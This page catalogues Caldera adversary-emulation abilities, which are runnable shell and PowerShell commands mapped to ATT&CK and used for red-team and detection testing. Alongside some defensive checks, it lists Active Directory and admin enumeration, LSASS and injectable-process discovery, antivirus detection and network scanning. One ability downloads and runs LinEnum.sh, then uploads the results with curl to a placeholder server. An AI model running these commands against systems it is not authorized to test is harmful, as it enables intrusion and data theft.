Caldera emulation abilities
211 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics
build-capabilities · 1 collection · 16 command-and-control · 6 credential-access · 10 defense-evasion · 15 detection · 8 discovery · 67 execution · 9 exfiltration · 13 hunt · 4 impact · 8 lateral-movement · 10 persistence · 3 privilege-escalation · 8 response · 14 setup · 10 technical-information-gathering · 1 training · 6 verification · 2
⚠
Abilities
50 shown of 211Find unauthorized processes
Search for processes which should not be on the host
Show command
[{"platform": "darwin", "executor": "sh", "command": "ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}'\n"}, {"platform": "linux", "executor": "sh", "command": "ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}'\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-NetTCPConnection -RemotePort \"#{remote.port.unauthorized}\" -EA silentlycontinue | where-object { write-host $_.OwningProcess }\n"}]Modified Sensitive Directory
Checks sensitive directory hashes against previously stored hashes to determine if the directory has been modified
Show command
[{"platform": "linux", "executor": "sh", "command": "directory=\"#{directory.sensitive.path}\";\nif [ -d $directory ];\n then tar -czf /tmp/dir_sens_comp -C $directory .;\n hash=$(sha256sum /tmp/dir_sens_comp | cut -d' ' -f1);\n rm -f /tmp/dir_sens_comp;\n if [ \"$hash\" != \"#{directory.sensitive.hash}\" ];\n then echo $directory;\n fi;\nelse echo $directory;\nfi;\n"}, {"platform": "darwin", "executor": "sh", "command": "directory=\"#{directory.sensitive.path}\";\nif [ -d $directory ];\n then tar -cf - -C $directory . | gzip --no-name > /tmp/dir_sens_comp;\n hash=$(shasum -a 256 /tmp/dir_sens_comp | cut -d' ' -f1);\n rm -f /tmp/dir_sens_comp;\n if [ \"$hash\" != \"#{directory.sensitive.hash}\" ];\n then echo $directory;\n fi;\nelse echo $directory;\nfi;\n"}, {"platform": "windows", "executor": "psh", "command": "$directory = \"#{directory.sensitive.path}\";\nif (Test-Path -PathType Container $directory) {\n Compress-Archive -Force -Path $($directory + \"\\*\") -DestinationPath C:\\Users\\Public\\dir_sens_comp.zip;\n $hash = (Get-FileHash C:\\Users\\Public\\dir_sens_comp.zip).Hash;\n Remove-Item -Force C:\\Users\\Public\\dir_sens_comp.zip;\n if ($hash -ne \"#{directory.sensitive.hash}\") {\n echo $directory;\n }\n} else {\n echo $directory;\n}\n"}]Modified Sensitive Files
Checks sensitive file hashes against previously stored hashes to determine if the file has been modified
Show command
[{"platform": "linux", "executor": "sh", "command": "filepath=\"#{file.sensitive.path}\";\nif [ ! -f $filepath ] || [ \"$(sha256sum $filepath | cut -d' ' -f1)\" != \"#{file.sensitive.hash}\" ];\n then echo $filepath;\nfi\n"}, {"platform": "darwin", "executor": "sh", "command": "filepath=\"#{file.sensitive.path}\";\nif [ ! -f $filepath ] || [ \"$(shasum -a 256 $filepath | cut -d' ' -f1)\" != \"#{file.sensitive.hash}\" ];\n then echo $filepath;\nfi\n"}, {"platform": "windows", "executor": "psh", "command": "if (-not (Test-Path -PathType Leaf #{file.sensitive.path}) -or (Get-FileHash #{file.sensitive.path}).Hash -ne \"#{file.sensitive.hash}\") { echo #{file.sensitive.path} }\n"}]New Cron Jobs
Checks to see if a new (unauthorized) cron job has been added
Show command
[{"platform": "linux", "executor": "sh", "command": "set -f;\nfor user in $(getent passwd | cut -f1 -d:); do\n $(crontab -u $user -l 2>/dev/null | grep -v '\\#' | while read -r job; do\n echo \"${user}>${job}\" >> /tmp/cron_jobs;\n done);\ndone;\ncat /tmp/cron_jobs | sort > /tmp/new_cronjobs_list.txt;\nnew_jobs=$(comm -13 /tmp/baseline_cronjobs_list.txt /tmp/new_cronjobs_list.txt);\nrm -f /tmp/cron_jobs;\nrm -f /tmp/new_cronjobs_list.txt;\nIFS=$(echo '\\n');\necho $new_jobs;\n"}, {"platform": "darwin", "executor": "sh", "command": "set -f;\nfor user in $(dscl . list /Users | grep -v \"^_\"); do\n $(crontab -u $user -l 2>/dev/null | grep -v '\\#' | while read -r job; do\n echo \"${user}>${job}\" >> /tmp/cron_jobs;\n done);\ndone;\ncat /tmp/cron_jobs | sort > /tmp/new_cronjobs_list.txt;\nnew_jobs=$(comm -13 /tmp/baseline_cronjobs_list.txt /tmp/new_cronjobs_list.txt);\nrm -f /tmp/cron_jobs;\nrm -f /tmp/new_cronjobs_list.txt;\nIFS=$(echo '\\n');\necho $new_jobs;\n"}]New Scheduled Tasks
Checks to see if a new (unauthorized) scheduled task has been added
Show command
[{"platform": "windows", "executor": "psh", "command": "Get-ScheduledTask > C:\\Users\\Public\\new_schtasks_list.txt;\n$new_schtasks = $(Get-Content .\\new_schtasks_list.txt) | Where-Object {$_ -notIn $(Get-Content .\\baseline_schtasks_list.txt)} |foreach-object {(-split $_)[1]};\nRemove-Item -Path C:\\Users\\Public\\new_schtasks_list.txt -Force;\n$new_schtasks\n"}]Suspicious URLs in mail
Finds suspicious URLs in received mail
Show command
[{"platform": "linux", "executor": "sh", "command": "find /var/mail -type f -exec grep \"From.*@.*\\..*\" {} \\; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq\n"}, {"platform": "darwin", "executor": "sh", "command": "find /var/mail -type f -exec grep \"From.*@.*\\..*\" {} \\; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq\n"}]Account Discovery (all)
The net utility is executed via cmd to enumerate domain user accounts.
Show command
[{"platform": "windows", "executor": "cmd", "command": "net user /domain"}]Account Discovery (targeted)
The net utility is executed via cmd to enumerate detailed information about a specific user account.
Show command
[{"platform": "windows", "executor": "cmd,psh", "command": "net user #{domain.user.name} /domain"}]Account-type Admin Enumerator
Use PowerView to query the Active Directory server to determine remote admins
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1;\n$backup = \"#{backup.admin.ability}\";\n$userName = \"#{domain.user.name}\";\n$userPassword = \"#{domain.user.password}\";\n$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force;\n$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword);\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject\n"}]Application Window Discovery
Extracts the names of all open non-explorer windows, and the locations of all explorer windows.
Show command
[{"platform": "windows", "executor": "psh", "command": "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)"}]Check Chrome
Check to see if Gooogle Chrome browser is installed
Show command
[{"platform": "darwin", "executor": "sh", "command": "which google-chrome\n"}, {"platform": "linux", "executor": "sh", "command": "which google-chrome\n"}]Check Go
Check to see if GoLang is installed
Show command
[{"platform": "darwin", "executor": "sh", "command": "which go\n"}, {"platform": "linux", "executor": "sh", "command": "which go\n"}]Check Python
Check to see what version of python is installed
Show command
[{"platform": "darwin", "executor": "sh", "command": "python3 --version;python2 --version;python --version\n"}, {"platform": "linux", "executor": "sh", "command": "python3 --version;python2 --version;python --version\n"}, {"platform": "windows", "executor": "cmd", "command": "python3 --version&python2 --version&python --version\n"}]Collect ARP details
Locate all active IP and FQDNs on the network
Show command
[{"platform": "darwin", "executor": "sh", "command": "arp -a"}, {"platform": "linux", "executor": "sh", "command": "arp -a"}, {"platform": "windows", "executor": "psh,cmd", "command": "arp -a"}]Current User
Obtain user from current session
Show command
[{"platform": "darwin", "executor": "sh", "command": "whoami\n"}, {"platform": "linux", "executor": "sh", "command": "whoami\n"}, {"platform": "windows", "executor": "psh", "command": "whoami\n"}]Discover Domain Admins
Use PowerView to query the Active Directory server to determine remote admins
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1;\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn}\n"}]Discover Mail Server
Identify the organizations mail server
Show command
[{"platform": "linux", "executor": "sh", "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev"}, {"platform": "darwin", "executor": "sh", "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev"}, {"platform": "windows", "executor": "psh", "command": "(nslookup -querytype=mx #{target.org.domain}. | Select-String -pattern 'mail' | Out-String).Trim()\n"}]Discover antivirus programs
Identify AV
Show command
[{"platform": "darwin", "executor": "sh", "command": "find /Applications/ -maxdepth 2 -iname *.app | grep -io \"[a-z ]*\\.app\" | grep -Ei -- \"symantec|norton|bitdefender|kapersky|eset|avast|avira|malwarebytes|sophos|(trend micro)\"\n"}, {"platform": "windows", "executor": "psh", "command": "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\n"}]Discover domain controller
Identify the remote domain controllers
Show command
[{"platform": "windows", "executor": "cmd", "command": "nltest /dsgetdc:%USERDOMAIN%\n"}, {"platform": "windows", "executor": "psh", "command": "nltest /dsgetdc:$env:USERDOMAIN\n"}]Discover injectable process
Discovers processes that the current user has the ability to access and selects an injectable one
Show command
[{"platform": "windows", "executor": "psh", "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\n$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq \"svchost\") {$p} };\n$valid | ConvertTo-Json\n"}]Discover local hosts
Use PowerView to query the Active Directory server for a list of computers in the Domain
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1;\nGet-DomainComputer\n"}]Discover system services
Identify system services
Show command
[{"platform": "windows", "executor": "psh", "command": "Get-Service"}]File and Directory Discovery
Find or discover files on the file system
Show command
[{"platform": "windows", "executor": "psh", "command": "Get-ChildItem -Path #{host.system.path}\n"}]Find Domain
Find Domain information
Show command
[{"platform": "windows", "executor": "psh", "command": "nbtstat -n\n"}]Find Hostname
Find hostname of remote host
Show command
[{"platform": "windows", "executor": "psh", "command": "nbtstat -A #{remote.host.ip}"}]Find LSASS
Get process info for LSASS
Show command
[{"platform": "windows", "executor": "psh", "command": "$ps = get-process | select processname,Id;\n$valid = foreach($p in $ps) { if($p.ProcessName -eq \"lsass\") {$p} };\n$valid | ConvertTo-Json\n"}, {"platform": "windows", "executor": "cmd", "command": ""}]Find OS Version
Find OS Version
Show command
[{"platform": "windows", "executor": "psh", "command": "[environment]::OSVersion.Version\n"}]Find System Network Connections
Find System Network Connections
Show command
[{"platform": "darwin", "executor": "sh", "command": "netstat -anto\n"}, {"platform": "linux", "executor": "sh", "command": "netstat -anto\n"}, {"platform": "windows", "executor": "psh", "command": "netstat -anto;\nGet-NetTCPConnection\n"}]Find deletable dirs (per user)
Discover all directories containing deletable files by user
Show command
[{"platform": "darwin", "executor": "sh", "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n"}, {"platform": "linux", "executor": "sh", "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n"}]Find local users
Get a list of all local users
Show command
[{"platform": "darwin", "executor": "sh", "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n"}, {"platform": "linux", "executor": "sh", "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n"}]Find user processes
Get process info for processes running as a user
Show command
[{"platform": "darwin", "executor": "sh", "command": "ps aux | grep #{host.user.name}\n"}, {"platform": "linux", "executor": "sh", "command": "ps aux | grep #{host.user.name}\n"}, {"platform": "windows", "executor": "psh", "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\nforeach($p in $ps) {\n if($p.Owner -eq \"#{host.user.name}\") {\n $p;\n }\n}\n"}]Fingerprint network services
Uses nmap to fingerprint services that were network accessible
Show command
[{"platform": "darwin", "executor": "sh", "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n"}, {"platform": "linux", "executor": "sh", "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n"}]Get Chrome Bookmarks
Get Chrome Bookmarks
Show command
[{"platform": "darwin", "executor": "sh", "command": "cat ~/Library/Application\\ Support/Google/Chrome/Default/Bookmarks\n"}]Get System Time
get current system time (ISO 8601)
Show command
[{"platform": "darwin", "executor": "sh", "command": "date -u +\"%Y-%m-%dT%H:%M:%SZ\"\n"}, {"platform": "linux", "executor": "sh", "command": "date -u +\"%Y-%m-%dT%H:%M:%SZ\"\n"}, {"platform": "windows", "executor": "psh", "command": "Get-Date -UFormat '+%Y-%m-%dT%H:%M:%SZ'\n"}]GetAdminMembers
Get Administrator users for a computer
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -AdminCount | ConvertTo-Json -Depth 1\n"}]GetComputers (Alice)
Get a list of all computers in a domain
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\PowerView.ps1 -Force;\nGet-NetComputer\n"}]GetDomain
Determine the Windows Domain of a computer
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 1\n"}]GetServiceAccounts
Get Service Accounts for a domain
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -SPN | ConvertTo-Json -Depth 1\n"}]Identify Firewalls
Identify Firewalls
Show command
[{"platform": "windows", "executor": "psh", "command": "$NameSpace = Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\n$SecurityCenter = $NameSpace | Select-Object -First 1;\nGet-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\n"}]Identify active user
Find user running agent
Show command
[{"platform": "darwin", "executor": "sh", "command": "whoami"}, {"platform": "linux", "executor": "sh", "command": "whoami"}, {"platform": "windows", "executor": "psh", "command": "$env:username\n"}, {"platform": "windows", "executor": "cmd", "command": "echo %username%"}]Identify local users
Identify all local users
Show command
[{"platform": "darwin", "executor": "sh", "command": "dscl . list /Users | grep -v '_'\n"}, {"platform": "windows", "executor": "psh", "command": "Get-WmiObject -Class Win32_UserAccount\n"}]Internet Explorer Version
Determine the version of Internet Explorer running
Show command
[{"platform": "windows", "executor": "psh", "command": "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer').Version\n"}]Linux Enumeration & Privilege Escalation Discovery Script
Download and execute LinEnum.sh
Show command
[{"platform": "linux", "executor": "sh", "command": "wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;\nchmod +x LinEnum.sh;\n./LinEnum.sh > /tmp/exfil.txt;\ncurl -F 'data=@/tmp/exfil.txt' #{server}/file/upload ;\ncat /tmp/exfil.txt;\n"}]List Directory
List contents of current directory
Show command
[{"platform": "darwin", "executor": "sh", "command": "ls\n"}, {"platform": "linux", "executor": "sh", "command": "ls\n"}, {"platform": "windows", "executor": "psh", "command": "dir\n"}]
discovery
[]
Local FQDN
Uses windows libraries to get FQDN of infected host
Show command
[]
Locate file from printer queue
Locate file that appears in the printer queue
Show command
[{"platform": "linux", "executor": "sh", "command": "find ~ -type f -name #{host.print.file} 2>/dev/null"}, {"platform": "darwin", "executor": "sh", "command": "find ~ -type f -name #{host.print.file} 2>/dev/null"}]Network Interface Configuration
View network configuration info for host
Show command
[{"platform": "darwin", "executor": "sh", "command": "sudo ifconfig\n"}, {"platform": "linux", "executor": "sh", "command": "sudo ifconfig\n"}, {"platform": "windows", "executor": "psh", "command": "ipconfig\n"}]Network Service Scanning
Scans the local network for common open ports
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module ./basic_scanner.ps1;\n$ports = @(22, 53, 80, 445);\nGet-NetIPConfiguration | ?{$_.NetAdapter.Status -ne \"Disconnected\"} | Get-NetIPaddress -AddressFamily IPv4 | %{\n $ipv4 = $_.IPAddress;\n $prefixLength = $_.PrefixLength;\n Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports $ports;\n};\n"}]Parse SSH known_hosts
View the known_hosts file
Show command
[{"platform": "darwin", "executor": "sh", "command": "cat ~/.ssh/known_hosts\n"}, {"platform": "linux", "executor": "sh", "command": "cat ~/.ssh/known_hosts\n"}]Password Policy
Password Policy Discovery
Show command
[{"platform": "darwin", "executor": "sh", "command": "pwpolicy getaccountpolicies\n"}, {"platform": "linux", "executor": "sh", "command": "cat /etc/pam.d/common-password\n"}, {"platform": "windows", "executor": "psh", "command": "net accounts"}]Showing 51-100 of 211